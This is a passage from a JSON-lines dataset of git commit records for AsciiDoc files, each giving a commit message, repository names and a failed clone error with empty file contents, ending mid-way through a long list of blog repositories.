<b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab98f51a88b1b4c306fe89cf2b8c2f1f2243a08b","subject":"[doc] Fix","message":"[doc] Fix","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb3b2a3bb4cb144623d7349eb7ae71524ae83dcf","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-transform-queryparameters","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-queryparameters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54f7121832e8de781b317fb588a0bd973b32b7d7","subject":"adding comments in README","message":"adding comments in README\n","repos":"corbtastik\/spring-cloud-stream-samples,corbtastik\/spring-cloud-stream-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/corbtastik\/spring-cloud-stream-samples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0814f72d66600967c9bf5f1c743ce0ee64e5c1f2","subject":"update doc section","message":"update doc section\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"344532d1dbd7c9ad289414df4e55c88718a58ce6","subject":"fixed typo in README","message":"fixed typo in README\n","repos":"flocke\/scripts,flocke\/scripts,flocke\/scripts","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flocke\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"704eea79f118c42c0cc44f2ae0c71322b0ac9bb9","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3da584bda1e99d517858d5b862768e1e2c5b1a1c","subject":"Update 2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","message":"Update 2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","new_file":"_posts\/2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03cc0e70d3d9afa518c56e694ece18166e8253ea","subject":"Fix #630","message":"Fix #630\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef686beff0851ea97f6ce8559a85d991fb27eacf","subject":"Update 2016-07-24-Geneaologia.adoc","message":"Update 2016-07-24-Geneaologia.adoc","repos":"kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm","old_file":"_posts\/2016-07-24-Geneaologia.adoc","new_file":"_posts\/2016-07-24-Geneaologia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kornel661\/blog-test-jm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0716a8d6cd89ccdbd45fb100b5bf89f7f96211b2","subject":"Update ricka.adoc (#12)","message":"Update ricka.adoc (#12)\n\n* Update ricka.adoc\r\n\r\n* Update ricka.adoc\r\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_team\/ricka.adoc","new_file":"_team\/ricka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c91dadc52bf9b38e2d0d5a84aae5b91df46ef92","subject":"Renamed '_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc' to '_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc'","message":"Renamed '_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc' to '_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc'","repos":"ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io","old_file":"_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc","new_file":"_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImpossibleBlog\/impossibleblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b139cf5565394215ab29324c0ca673a3ba041bf","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"935f4db670c646908916185c1d7fbaafa6a1d193","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c0fd5444dd6aadd740a05d3ce7c8ba281499e7","subject":"update changelog","message":"update changelog\n","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"194a3cdfcec3d1096e87d43dcc457fa6bfb665fa","subject":"Update 2016-07-28-2016-07-27.adoc","message":"Update 2016-07-28-2016-07-27.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-28-2016-07-27.adoc","new_file":"_posts\/2016-07-28-2016-07-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc8830006f71bd2466da80c042d8ff2386d3c84","subject":"Update 2017-06-19-serposcope.adoc","message":"Update 2017-06-19-serposcope.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-serposcope.adoc","new_file":"_posts\/2017-06-19-serposcope.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f17e6762f2a9a4d1ac22c91387b3c5f84cec8c98","subject":"y2b create post The Most INSANE Dual 75-inch Screen Setup!","message":"y2b create post The Most INSANE Dual 75-inch Screen Setup!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-26-The-Most-INSANE-Dual-75inch-Screen-Setup.adoc","new_file":"_posts\/2017-10-26-The-Most-INSANE-Dual-75inch-Screen-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ecf3e627dff1780ca4fcb4cdc0890e795267cd4","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f4136dc374c076f9d0d698422d95a2fbfeb9bad","subject":"Added Changelog (#2234)","message":"Added Changelog (#2234)\n\n* Add CHANGELOG.adoc\r\n\r\n* Reformat doc\r\n\r\n* Update content for v2.0b1","repos":"robotframework\/RIDE,robotframework\/RIDE,robotframework\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HelioGuilherme66\/RIDE.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83e448fb188a1d30909f349b6e2c782bc7f5f527","subject":"Upgrade README-ja","message":"Upgrade README-ja\n","repos":"hirako2000\/hirako2000.github.io,imukulsharma\/imukulsharma.github.io,nbourdin\/nbourdin.github.io,ricardozanini\/ricardozanini.github.io,demohi\/blog,jsonify\/jsonify.github.io,eunas\/eunas.github.io,B3H1NDu\/b3h1ndu.github.io,evolgenomology\/evolgenomology.github.io,davehardy20\/davehardy20.github.io,Asastry1\/inflect-blog,topicusonderwijs\/topicusonderwijs.github.io,olavloite\/olavloite.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,jankolorenc\/jankolorenc.github.io,KlimMalgin\/klimmalgin.github.io,Akanoa\/akanoa.github.io,gendalf9\/gendalf9.github.io---hubpress,esbrannon\/esbrannon.github.io,codechunks\/codechunks.github.io,acristyy\/acristyy.github.io,dobin\/dobin.github.io,timelf123\/timelf123.github.io,htapia\/htapia.github.io,rdspring1\/rdspring1.github.io,CarlosRPO\/carlosrpo.github.io,kfkelvinng\/kfkelvinng.github.io,PertuyF\/PertuyF.github.io,ashelle\/ashelle.github.io,rpawlaszek\/rpawlaszek.github.io,siarlex\/siarlex.github.io,osada9000\/osada9000.github.io,drankush\/drankush.github.io,arshakian\/arshakian.github.io,uzuyh\/hubpress.io,CBSti\/CBSti.github.io,al1enSuu\/al1enSuu.github.io,olivierbellone\/olivierbellone.github.io,dgrizzla\/dgrizzla.github.io,simevidas\/simevidas.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,masonc15\/masonc15.github.io,rvegas\/rvegas.github.io,foxsofter\/hubpress.io,trapexit\/trapexit.github.io,carlosdelfino\/carlosdelfino-hubpress,velo\/velo.github.io,christianmtr\/christianmtr.github.io,theofilis\/theofilis.github.io,realraindust\/realraindust.github.io,tamakinkun\/tamakinkun.github.io,backemulus\/backemulus.github.io,Le6ow5k1\/le6ow5k1.github.io,enderxyz\/enderxyz.github.io,warpcoil\/warpcoil.github.io,luzhox\/mejorandola.github.io,thiderman\/daenney.github.io,gardenias\/sddb.com,fbiville\/fbiville.github.io,marchelo2212\/marchelo2212.github.io,sanglt\/sanglt.github.io,alexandrev\/alexandrev.github.io,heliomsolivas\/heliomsolivas.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,ronanki\/ronanki.github.io,lovian\/lovian.github.io,amodig\/amodig.github.io,masonc15\/masonc15.github.io,alexgaspard\/alexgaspard.github.io,hapee\/hapee.github.io,quentindemolliens\/quentindemolliens.github.io,crimarde\/crimarde.github.io,susanburgess\/susanburgess.github.io,gajumaru4444\/gajumaru4444.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,euprogramador\/euprogramador.github.io,bahamoth\/bahamoth.github.io,icthieves\/icthieves.github.io,kubevirt\/blog,foxsofter\/hubpress.io,hytgbn\/hytgbn.github.io,neurodiversitas\/neurodiversitas.github.io,reversergeek\/reversergeek.github.io,suning-wireless\/Suning-Wireless.github.io,indusbox\/indusbox.github.io,PauloMoekotte\/PauloMoekotte.github.io,tongqqiu\/tongqqiu.github.io,Aferide\/Aferide.github.io,ciekawy\/ciekawy.github.io,zakkum42\/zakkum42.github.io,jia1miao\/jia1miao.github.io,rlebron88\/rlebron88.github.io,dingboopt\/dingboopt.github.io,fgracia\/fgracia.github.io,bbsome\/bbsome.github.io,reggert\/reggert.github.io,jgornati\/jgornati.github.io,rpwolff\/rpwolff.github.io,pzmarzly\/g2zory,demo-hubpress\/demo,spe\/spe.github.io.hubpress,jblemee\/jblemee.github.io,hapee\/hapee.github.io,gquintana\/gquintana.github.io,ca13\/hubpress.io,jaganz\/jaganz.github.io,harquail\/harquail.github.io,hitamutable\/hitamutable.github.io,gruenberg\/gruenberg.github.io,codechunks\/codechunks.github.io,tkountis\/tkountis.github.io,Roen00\/roen00.github.io,sfoubert\/sfoubert.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,laura-arreola\/laura-arreola.github.io,fqure\/fqure.github.io,hami-jp\/hami-jp.github.io,adler-j\/adler-j.github.io,enderxyz\/enderxyz.github.io,eknuth\/eknuth.github.io,ThomasLT\/thomaslt.github.io,lametaweb\/lametaweb.github.io,silviu\/silviu.github.io,RWOverdijk\/rwoverdijk.github.io,juliardi\/juliardi.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,thomaszahr\/thomaszahr.github.io,henryouly\/henryouly.github.io,pamasse\/pamasse.github.io,jarcane\/jarcane.github.io,peter-lawrey\/peter-lawrey.github.io,richard-popham\/richard-popham.github.io,theblankpages\/theblankpages.github.io,Ugotsta\/Ugotsta.github.io,royston\/hubpress.io,Fendi-project\/fendi-project.github.io,pysysops\/pysysops.github.io,carlomorelli\/carlomorelli.github.io,jivank\/jivank.github.io,Zatttch\/zatttch.github.io,tamakinkun\/tamakinkun.github.io,esbrannon\/esbrannon.github.io,ashmckenzie\/ashmckenzie.github.io,iolabailey\/iolabailey.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,Akanoa\/akanoa.github.io,ferandec\/ferandec.github.io,furcon\/furcon.github.io,hhimanshu\/hhimanshu.github.io,masonc15\/masonc15.github.io,richard-popham\/richard-popham.github.io,neuni\/neuni.github.io,anggadjava\/anggadjava.github.io,naru0504\/hubpress.io,adler-j\/adler-j.github.io,dfmooreqqq\/dfmooreqqq.github.io,pdudits\/pdudits.github.io,pzmarzly\/pzmarzly.github.io,CreditCardsCom\/creditcardscom.github.io,miroque\/shirokuma,IdoramNaed\/idoramnaed.github.io,romanegunkov\/romanegunkov.github.io,ntfnd\/ntfnd.github.io,alphaskade\/alphaskade.github.io,kfkelvinng\/kfkelvinng.github.io,sandersky\/sandersky.github.io,expelled\/expelled.github.io,carsnwd\/carsnwd.github.io,jivank\/jivank.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,ilyaeck\/ilyaeck.github.io,GWCATT\/gwcatt.github.io,lovian\/lovian.github.io,mattpearson\/mattpearson.github.io,popurax\/popurax.github.io,mikealdo\/mikealdo.github.io,oldkoyot\/oldkoyot.github.io,theblankpages\/theblankpages.github.io,thefreequest\/thefreequest.github.io,markfetherolf\/markfetherolf.github.io,jtsiros\/jtsiros.github.io,willnewby\/willnewby.github.io,gsera\/gsera.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,heliomsolivas\/heliomsolivas.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,ylliac\/ylliac.github.io,nobodysplace\/nobodysplace.github.io,StefanBertels\/stefanbertels.github.io,shinchiro\/shinchiro.github.io,ecmeyva\/ecmeyva.github.io,caseyy\/caseyy.github.io,raisedadead\/hubpress.io,never-ask-never-know\/never-ask-never-know.github.io,hotfloppy\/hotfloppy.github.io,deruelle\/deruelle.github.io,GDGSriLanka\/blog,cmolitor\/blog,minditech\/minditech.github.io,birvajoshi\/birvajoshi.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,matthiaselzinga\/matthiaselzinga.github.io,debbiezhu\/debbiezhu.github.io,tedbergeron\/hubpress.io,Andy4Craft\/andy4craft.github.io,cncgl\/cncgl.github.io,kai-cn\/kai-cn.github.io,RandomWebCrap\/randomwebcrap.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,fgracia\/fgracia.github.io,neurodiversitas\/neurodiversitas.github.io,topicusonderwijs\/topicusonderwijs.github.io,Aerodactyl\/aerodactyl.github.io,gruenberg\/gruenberg.github.io,FilipLaz\/filiplaz.github.io,pavistalli\/pavistalli.github.io,rage5474\/rage5474.github.io,MatanRubin\/MatanRubin.github.io,suedadam\/suedadam.github.io,wayr\/wayr.github.io,elidiazgt\/mind,jlboes\/jlboes.github.io,stratdi\/stratdi.github.io,gajumaru4444\/gajumaru4444.github.io,Asastry1\/inflect-blog,pointout\/pointout.github.io,tamakinkun\/tamakinkun.github.io,endymion64\/endymion64.github.io,tofusoul\/tofusoul.github.io,birvajoshi\/birvajoshi.github.io,maorodriguez\/maorodriguez.github.io,oppemism\/oppemism.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,luzhox\/mejorandola.github.io,chbailly\/chbailly.github.io,lucasferraro\/lucasferraro.github.io,AntoineTyrex\/antoinetyrex.github.io,florianhofmann\/florianhofmann.github.io,dingboopt\/dingboopt.github.io,Akanoa\/akanoa.github.io,ahopkins\/amhopkins.com,severin31\/severin31.github.io,noahrc\/noahrc.github.io,bretonio\/bretonio.github.io,gardenias\/sddb.com,Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io,chrizco\/chrizco.github.io,metasean\/blog,HiDAl\/hidal.github.io,justafool5\/justafool5.github.io,trapexit\/trapexit.github.io,yysk\/yysk.github.io,daemotron\/daemotron.github.io,alexgaspard\/alexgaspard.github.io,ca13\/hubpress.io,azubkov\/azubkov.github.io,davehardy20\/davehardy20.github.io,yahussain\/yahussain.github.io,daemotron\/daemotron.github.io,Astalaseven\/astalaseven.github.io,cdelmas\/cdelmas.github.io,xquery\/xquery.github.io,nikogamulin\/nikogamulin.github.io,CarlosRPO\/carlosrpo.github.io,cncgl\/cncgl.github.io,izziiyt\/izziiyt.github.io,nickwanhere\/nickwanhere.github.io,zouftou\/zouftou.github.io,amodig\/amodig.github.io,xumr0x\/xumr0x.github.io,bluenergy\/bluenergy.github.io,ahopkins\/amhopkins.com,thiderman\/daenney.github.io,netrunnerX\/netrunnerx.github.io,nectia-think\/nectia-think.github.io,DominikVogel\/DominikVogel.github.io,Kif11\/Kif11.github.io,jbrizio\/jbrizio.github.io,kimkha-blog\/kimkha-blog.github.io,hapee\/hapee.github.io,sgalles\/sgalles.github.io,javathought\/javathought.github.io,jbrizio\/jbrizio.github.io,sonyl\/sonyl.github.io,DullestSaga\/dullestsaga.github.io,xurei\/xurei.github.io,cothan\/cothan.github.io,deunz\/deunz.github.io,simevidas\/simevidas.github.io,extrapolate\/extrapolate.github.io,cringler\/cringler.github.io,fbruch\/fbruch.github.com,live-smart\/live-smart.github.io,furcon\/furcon.github.io,iwakuralai-n\/badgame-site,puzzles-engineer\/puzzles-engineer.github.io,wattsap\/wattsap.github.io,cmosetick\/hubpress.io,endymion64\/endymion64.github.io,hermione6\/hermione6.github.io,cdelmas\/cdelmas.github.io,izziiyt\/izziiyt.github.io,dannylane\/dannylane.github.io,topranks\/topranks.github.io,camilo28\/camilo28.github.io,tkountis\/tkountis.github.io,buliaoyin\/buliaoyin.github.io,osada9000\/osada9000.github.io,rushil-patel\/rushil-patel.github.io,vvani06\/hubpress-test,sebbrousse\/sebbrousse.github.io,rlebron88\/rlebron88.github.io,gjagush\/gjagush.github.io,pysaumont\/pysaumont.github.io,neomobil\/neomobil.github.io,osada9000\/osada9000.github.io,Bachaco-ve\/bachaco-ve.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,ghostbind\/ghostbind.github.io,wayr\/wayr.github.io,htapia\/htapia.github.io,richard-popham\/richard-popham.github.io,yoanndupuy\/yoanndupuy.github.io,YannDanthu\/YannDanthu.github.io,maurodx\/maurodx.github.io,xvin3t\/xvin3t.github.io,netrunnerX\/netrunnerx.github.io,olivierbellone\/olivierbellone.github.io,jarcane\/jarcane.github.io,blater\/blater.github.io,marioandres\/marioandres.github.io,Easter-Egg\/Easter-Egg.github.io,Roen00\/roen00.github.io,alchemistcookbook\/alchemistcookbook.github.io,roamarox\/roamarox.github.io,holtalanm\/holtalanm.github.io,siarlex\/siarlex.github.io,fadlee\/fadlee.github.io,OctavioMaia\/octaviomaia.github.io,devkamboj\/devkamboj.github.io,gquintana\/gquintana.github.io,blahcadepodcast\/blahcadepodcast.github.io,mozillahonduras\/mozillahonduras.github.io,joescharf\/joescharf.github.io,daemotron\/daemotron.github.io,nicolasmaurice\/nicolasmaurice.github.io,mahrocks\/mahrocks.github.io,lyqiangmny\/lyqiangmny.github.io,caryfitzhugh\/caryfitzhugh.github.io,alphaskade\/alphaskade.github.io,ahopkins\/amhopkins.com,cncgl\/cncgl.github.io,lovian\/lovian.github.io,KurtStam\/kurtstam.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,fuzzy-logic\/fuzzy-logic.github.io,cmolitor\/blog,shutas\/shutas.github.io,pokev25\/pokev25.github.io,MatanRubin\/MatanRubin.github.io,mdinaustin\/mdinaustin.github.io,MichaelIT\/MichaelIT.github.io,htapia\/htapia.github.io,sgalles\/sgalles.github.io,hoernschen\/hoernschen.github.io,datumrich\/datumrich.github.io,twentyTwo\/twentyTwo.github.io,deunz\/deunz.github.io,luzhox\/mejorandola.github.io,wushaobo\/wushaobo.github.io,hitamutable\/hitamutable.github.io,rushil-patel\/rushil-patel.github.io,FilipLaz\/filiplaz.github.io,datumrich\/datumrich.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,raloliver\/raloliver.github.io,chowwin\/chowwin.github.io,qeist\/qeist.github.io,mtx69\/mtx69.github.io,emtudo\/emtudo.github.io,Nil1\/Nil1.github.io,vs4vijay\/vs4vijay.github.io,jkschneider\/jkschneider.github.io,pyxozjhi\/pyxozjhi.github.io,skeate\/skeate.github.io,havvazaman\/havvazaman.github.io,Roen00\/roen00.github.io,lmcro\/hubpress.io,stratdi\/stratdi.github.io,fadlee\/fadlee.github.io,doochik\/doochik.github.io,murilo140891\/murilo140891.github.io,flug\/flug.github.io,zestyroxy\/zestyroxy.github.io,tr00per\/tr00per.github.io,flug\/flug.github.io,fbridault\/sandblog,umarana\/umarana.github.io,ioisup\/ioisup.github.io,hitamutable\/hitamutable.github.io,namlongwp\/namlongwp.github.io,scottellis64\/scottellis64.github.io,polarbill\/polarbill.github.io,miroque\/shirokuma,mikealdo\/mikealdo.github.io,icthieves\/icthieves.github.io,ciptard\/ciptard.github.io,amodig\/amodig.github.io,Nekothrace\/nekothrace.github.io,wattsap\/wattsap.github.io,smirnoffs\/smirnoffs.github.io,live-smart\/live-smart.github.io,endymion64\/endymion64.github.io,heberqc\/heberqc.github.io,fuhrerscene\/fuhrerscene.github.io,nicolasmaurice\/nicolasmaurice.github.io,hytgbn\/hytgbn.github.io,MartinAhrer\/martinahrer.github.io,tjfy1992\/tjfy1992.github.io,zubrx\/zubrx.github.io,CarlosRPO\/carlosrpo.github.io,elvarb\/elvarb.github.io,ferandec\/ferandec.github.io,blackgun\/blackgun.github.io,anggadjava\/anggadjava.github.io,mdramos\/mdramos.github.io,ImpossibleBlog\/impossibleblog.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,cothan\/cothan.github.io,diogoan\/diogoan.github.io,kzmenet\/kzmenet.github.io,xavierdono\/xavierdono.github.io,acien101\/acien101.github.io,maorodriguez\/maorodriguez.github.io,unay-cilamega\/unay-cilamega.github.io,roobyz\/roobyz.github.io,dbect\/dbect.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,evolgenomology\/evolgenomology.github.io,jcsirot\/hubpress.io,endymion64\/VinJBlog,devopSkill\/devopskill.github.io,Joemoe117\/Joemoe117.github.io,Lh4cKg\/Lh4cKg.github.io,CBSti\/CBSti.github.io,jrhea\/jrhea.github.io,SuperMMX\/supermmx.github.io,PertuyF\/PertuyF.github.io,duarte-fonseca\/duarte-fonseca.github.io,ricardozanini\/ricardozanini.github.io,carsnwd\/carsnwd.github.io,noahrc\/noahrc.github.io,blater\/blater.github.io,RWOverdijk\/rwoverdijk.github.io,akr-optimus\/akr-optimus.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,itsashis4u\/hubpress.io,SingularityMatrix\/SingularityMatrix.github.io,crotel\/crotel.github.com,miplayer1\/miplayer1.github.io,jarbro\/jarbro.github.io,christiannolte\/hubpress.io,geummo\/geummo.github.io,grzrobak\/grzrobak.github.io,yeddiyarim\/yeddiyarim.github.io,StefanBertels\/stefanbertels.github.io,gjagush\/gjagush.github.io,warpcoil\/warpcoil.github.io,iolabailey\/iolabailey.github.io,djmdata\/djmdata.github.io,mkhymohamed\/mkhymohamed.github.io,mkaptein172\/mkaptein172.github.io,devopSkill\/devopskill.github.io,patricekrakow\/patricekrakow.github.io,itsashis4u\/hubpress.io,kr-b\/kr-b.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,pwlprg\/pwlprg.github.io,chrizco\/chrizco.github.io,faldah\/faldah.github.io,JithinPavithran\/JithinPavithran.github.io,uskithub\/uskithub.github.io,joescharf\/joescharf.github.io,zakkum42\/zakkum42.github.io,scriptindex\/scriptindex.github.io,caglarsayin\/hubpress,studiocardo\/studiocardo.github.io,yahussain\/